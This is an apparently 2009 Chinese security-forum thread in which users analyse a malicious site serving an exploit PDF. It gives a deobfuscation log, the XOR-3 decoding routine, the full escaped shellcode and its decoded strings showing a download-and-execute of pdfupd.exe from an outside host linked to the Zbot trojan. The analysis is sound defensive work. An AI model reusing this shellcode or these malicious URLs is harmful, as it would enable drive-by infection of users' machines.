findbigwords.cn

qianwenxiang

关于:hxxp://findbigwords.cn/解密的日志(全体输出 -  4):
Level  1>http://findbigwords.cn/ts/in.cgi?banner6
Level  2>http://findbigwords.cn/index.php?banner6
Level  3>http://bestlitediscover.cn:8080/cache/readme.pdf
Level  3>[TR.Zbot]http://bestlitediscover.cn:8080/load.php?id=0
日志由 Redoce1.9第60次修正版于 2009-5-29 11:43:55 生成。

王子带着刀

这个网站我有点怕
我刚才进去
我的NOD32和网盾都没有报
死机了
强制关机

250662772

打开怎么出现这个提示!
It works!

qianwenxiang

挂马的撤除了吧。。或者是多次读取代码的缘故？

knifed

那个pdf如何解.

雨宫优子

打开PDF找到最后那段JS


将\(替换成(，将\)替换成)，将\\\\替换成\\然后执行就行了

雨宫优子

或者用XX??XX?XXXXXXXX???最新版中的PDF内JS标准态转换功能

qianwenxiang

广告来也
第一步，Redoce 1.960以后，右键还原代码
第二步，6>eval执行取得返回值
第三步，观察代码：
function We8x5kz(Sx4pojsk){var Glt73pf29=0;var T5ceelf9m="";for(Glt73pf29=0;Glt73pf29<Sx4pojsk.length;Glt73pf29++){T5ceelf9m=T5ceelf9m+String.fromCharCode(Sx4pojsk.charCodeAt(Glt73pf29)^3)}return T5ceelf9m}
可知是把各个字符异或3输出。
选中变量所有数字，参数：3，使用运算：1>代码区Xor运算(参数)即可得到：

1. %u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u622f%u7365%u6c74%u7469%u6465%u7369%u6f63%u6576%u2e72%u6e63%u383a%u3830%u2f30%u616c%u646e%u6769%u702e%u7068%u693f%u3d64%u0038%u9000

复制代码

使用％uX功能，猜测得到XORKey＝00
使用[P]功能，得到最后数据：

QRPSVWU      ]   1 d @0x  @  p   @    @4 @| @<VW ^      N          _^    ^   Rh      N       ^   1     5c      t   2F    2     E   R  R       P   RP  V   j j     ^   R    x   Rj   j     ^   R  Z       ^   Rh      N       ^   1     5n      t   2F    2     E   R  R       P   RP  V   j j     ^   R        Rj   j     ^   R  Z    ]_^ZY[X                 GetTempPathA LoadLibraryA GetProcAddress WinExec      0  u )   1  <         f        px                              P         ^1  V          Q   Yt ^C  ^     '   1  f                                            VW X   _^    > t    URLMON.DLL URLDownloadToFileA pdfupd.exe crash.php http://bestlitediscover.cn:8080/landig.php?id=8   
PSQRVWU      ]   1 d @0x  @  p   @    @4 @| @<VW ^      N          _^    ^   Rh      N       ^   1     5c      t   2F    2     E   R  R       P   RP  V   j j     ^   R    x   Rj   j     ^   R  Z       ^   Rh      N       ^   1     5n      t   2F    2     E   R  R       P   RP  V   j j     ^   R        Rj   j     ^   R  Z    ]_^ZY[X                 GetTempPathA LoadLibraryA GetProcAddress WinExec      0  u )   1  <         f        px                              P         ^1  V          Q   Yt ^C  ^     '   1  f                                            VW X   _^    > t    URLMON.DLL URLDownloadToFileA pdfupd.exe crash.php http://bestlitediscover.cn:8080/landig.php?id=8   

Kitman

在沒有或不能用redoce的情況下可以怎解?

qianwenxiang

1， 手动替换：将\(替换成(，将\)替换成)，将\\\\替换成\\
2， eval改为alert，HTML执行获取代码
3， 只保留以下代码：
function We8x5kz(Sx4pojsk){var Glt73pf29=0;var T5ceelf9m="";for(Glt73pf29=0;Glt73pf29<Sx4pojsk.length;Glt73pf29++){T5ceelf9m=T5ceelf9m+String.fromCharCode(Sx4pojsk.charCodeAt(Glt73pf29)^3)}return T5ceelf9m};
var Bmk5tz="&v6063&"+"v6162&v"+"6465&v:"+"`66&v33..........直到..........545"+":&v431f"+"&v435;&"+"v5:0e&v"+"0g57&v3"+"30;&v:3"+"33"+"";
alert(We8x5kz(Bmk5tz));
即可获得解密过的ShellCode
4， 新建文档，修改代码：
<script>
var e=unescape("shellcode");
var i,r="";
for (i=0;i<e.length;i++){r=r+String.fromCharCode(e.charCodeAt(i)^0=0?32:e.charCodeAt(i)^0);}
document.write(r);</script>

不用任何工具的，最后一步不知道行不行。。